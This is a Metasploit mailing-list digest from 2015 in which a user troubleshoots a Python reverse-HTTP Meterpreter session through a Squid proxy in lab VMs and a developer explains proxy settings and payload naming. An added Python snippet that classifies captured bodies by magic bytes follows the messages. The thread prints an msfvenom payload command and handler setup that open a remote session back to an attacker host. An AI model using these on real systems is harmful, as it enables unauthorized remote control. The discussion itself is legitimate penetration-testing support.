Metasploit mailing list archives
Re: framework Digest, Vol 83, Issue 2
From: Spencer McIntyre <zerosteiner () gmail com>
Date: Wed, 04 Mar 2015 18:14:22 +0000
Mike Jones!

No, the python part of python/meterpreter/reverse_http is the platform so all the stages compatible with it python/*/reverse_http are all in python. There is only a meterpreter stage for python, but the naming rule of platform/stage/stager goes for the other payloads as well such as windows/meterpreter/reverse_http. Also note that there is sometimes an architecture after the platform, i.e. linux/x86/*.

Because you're using a python payload it will never respond with an ELF file in the stage. You may want to look at the linux/x86/meterpreter/reverse_tcp payload instead. It still will not send a full ELF header in the stage but the payload itself will be a native meterpreter for your debian systems.

There's some good info on how payloads are named and work in the wiki here: https://github.com/rapid7/metasploit-framework/wiki/How-payloads-work.

Spencer

On Wed, Mar 4, 2015 at 1:00 PM <framework-request () spool metasploit com> wrote:
Send framework mailing list submissions to
framework () spool metasploit com

To subscribe or unsubscribe via the World Wide Web, visit
https://dev.metasploit.com/mailman/listinfo/framework
or, via email, send a message with subject or body 'help' to
framework-request () spool metasploit com

You can reach the person managing the list at
framework-owner () spool metasploit com

When replying, please edit your Subject line so it is more specific than "Re: Contents of framework digest..."

Today's Topics:

1. Re: framework Digest, Vol 83, Issue 1 (Spencer McIntyre)
2. Re: framework Digest, Vol 83, Issue 1 (Mike Jones!)

----------------------------------------------------------------------

Message: 1
Date: Tue, 03 Mar 2015 18:47:31 +0000
From: Spencer McIntyre <zerosteiner () gmail com>
To: framework () spool metasploit com
Subject: Re: [framework] framework Digest, Vol 83, Issue 1
Message-ID: <CAMKhuE-KC09sxNB84Bvk-C3ZHM13UdCtrCTB5r0ETNfAPsUjyQ@mail.gmail.com>
Content-Type: text/plain; charset="utf-8"

Mike Jones!

The PROXYHOST and PROXYPORT must also be set in the handler. This is because when the stage is sent, the proxy settings are patched in by the instance of Metasploit running on the attacker's system when it is requested by the stager. Because of this, it's necessary to set the PROXYHOST and PROXYPORT options to the same values on the handler as was specified when creating the payload with msfvenom.

If when the proxy options are set the session still does not respond, it's possible there is another issue and opening a ticket on GitHub with the output would be helpful for tracking.
https://github.com/rapid7/metasploit-framework/issues

I hope that helps Mike Jones!

On Tue, Mar 3, 2015 at 1:00 PM <framework-request () spool metasploit com> wrote:

Today's Topics:

1. python/meterpreter/reverse_http timeout (Mike Jones!)

----------------------------------------------------------------------

Message: 1
Date: Mon, 2 Mar 2015 12:35:01 -0800
From: "Mike Jones!" <property.of.mike.jones () gmail com>
To: framework <framework () spool metasploit com>
Subject: [framework] python/meterpreter/reverse_http timeout
Message-ID: <CAGZNKFsAxyymTa=LBa9KrK+JxeceyLT6nUU1wrhWXzxiU7YtEQ@mail.gmail.com>
Content-Type: text/plain; charset="utf-8"

I'm testing payloads through a proxy in my VMs and can't get any meterpreter commands to work after the session opens. All VMs are running Debian.

Victim: 10.17.24.128
Proxy: 10.17.24.10 and 172.16.22.10 (running Squid)
Attacker: 172.16.22.22

I've generated a payload with msfvenom:

msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080 PROXYHOST=10.17.24.10 PROXYPORT=3128

Set up a handler:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http
PAYLOAD => python/meterpreter/reverse_http
msf exploit(handler) > set LHOST 172.16.22.22
LHOST => 172.16.22.22
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit -j

Executing the payload on the victim looks fine. Session hits on metasploit, and I can interact with it but none of the commands respond:

msf exploit(handler) > [*] 172.16.22.10:52399 Request received for /x5LW...
[*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399) at 2015-03-02 14:12:10 -0600
sessions -l

Active sessions
===============

  Id  Type                       Information  Connection
  --  ----                       -----------  ----------
  1   meterpreter python/python               172.16.22.22:8080 -> 172.16.22.10:52399 (172.16.22.10)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.

I tried setting up the handler with and without PROXYHOST and PROXYPORT, neither way worked, though I suspect without those values is the correct approach.

What am I missing? Thanks in advance.

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://dev.metasploit.com/pipermail/framework/attachments/20150302/3f873c79/attachment-0001.html>

------------------------------

Subject: Digest Footer

_______________________________________________
framework mailing list
framework () spool metasploit com
https://dev.metasploit.com/mailman/listinfo/framework

------------------------------

End of framework Digest, Vol 83, Issue 1
****************************************

------------------------------

Message: 2
Date: Tue, 3 Mar 2015 16:51:11 -0800
From: "Mike Jones!" <property.of.mike.jones () gmail com>
To: Spencer McIntyre <zerosteiner () gmail com>
Cc: framework <framework () spool metasploit com>
Subject: Re: [framework] framework Digest, Vol 83, Issue 1
Message-ID: <CAGZNKFvDjfRdC_ceDMWJAYvPYkmgtWzdZ3iO6S6yhag1DB_psw () mail gmail com>
Content-Type: text/plain; charset="utf-8"

Thanks for the reply, Spencer. Your explanation makes sense.

I found what is probably another issue with my setup: Meterpreter is sending a Windows executable across in the stage.
After setting PROXYHOST and PROXYPORT, msfconsole would see the connection and begin sending the stage but then hang. I started sniffing on the proxy to see what was going on and noticed an MZ stub and PE header go by. I'm guessing that won't work with all the systems involved running Debian. I looked for an ELF header but didn't see one.

Is there any way to get metasploit to serve up an ELF in the stage while still using python/meterpreter/reverse_http?

Sorry if this is a completely stupid question -- I am pretty inexperienced with metasploit as you can tell.

------------------------------

End of framework Digest, Vol 83, Issue 2
****************************************
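
The check described in the thread (looking in proxy traffic for an MZ stub and PE header versus an ELF header), written out as an added example that is not part of the original messages: a Python function that labels a captured HTTP response body by its magic bytes. The function name, machine tables and sample buffers are constructed for illustration.

```python
import struct

# Small lookup tables for the Machine / e_machine fields (not exhaustive).
PE_MACHINES = {0x014C: "x86", 0x8664: "x86_64"}
ELF_MACHINES = {3: "x86", 40: "arm", 62: "x86_64", 183: "aarch64"}


def classify_body(body: bytes) -> str:
    """Label a captured response body as ELF, PE, text, or unknown binary."""
    if body[:4] == b"\x7fELF" and len(body) >= 20:
        # EI_CLASS (offset 4): 1 = 32-bit, 2 = 64-bit
        bits = {1: 32, 2: 64}.get(body[4], 0)
        # EI_DATA (offset 5): 1 = little-endian, 2 = big-endian
        endian = "<" if body[5] == 1 else ">"
        (machine,) = struct.unpack_from(endian + "H", body, 18)  # e_machine
        return f"ELF{bits} {ELF_MACHINES.get(machine, hex(machine))}"
    if body[:2] == b"MZ" and len(body) >= 0x40:
        # e_lfanew at 0x3C holds the file offset of the "PE\0\0" signature.
        (pe_off,) = struct.unpack_from("<I", body, 0x3C)
        if body[pe_off:pe_off + 4] == b"PE\x00\x00" and len(body) >= pe_off + 6:
            (machine,) = struct.unpack_from("<H", body, pe_off + 4)
            return f"PE {PE_MACHINES.get(machine, hex(machine))}"
        return "MZ stub without PE header"
    sample = body[:512]
    # Printable ASCII plus tab/LF/CR: a script or other text, not a native image.
    if sample and all(b in (9, 10, 13) or 32 <= b < 127 for b in sample):
        return "text"
    return "unknown binary"


def _sample_pe() -> bytes:
    # Constructed sample: DOS header with e_lfanew = 0x80, then PE signature.
    dos = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x80)
    return dos.ljust(0x80, b"\x00") + b"PE\x00\x00" + struct.pack("<H", 0x014C)


def _sample_elf() -> bytes:
    # Constructed sample: 32-bit little-endian ELF ident, e_type=2, e_machine=3.
    return b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9 + struct.pack("<HH", 2, 3)


SAMPLES = {
    "pe": _sample_pe(),
    "elf": _sample_elf(),
    "script": b"import sys\nprint(sys.version)\n",  # constructed text body
}

if __name__ == "__main__":
    for name, data in SAMPLES.items():
        print(name, "->", classify_body(data))
```

Running the same function over bodies reassembled from a proxy capture gives a quick answer to "what format was actually sent" without reading hex by eye.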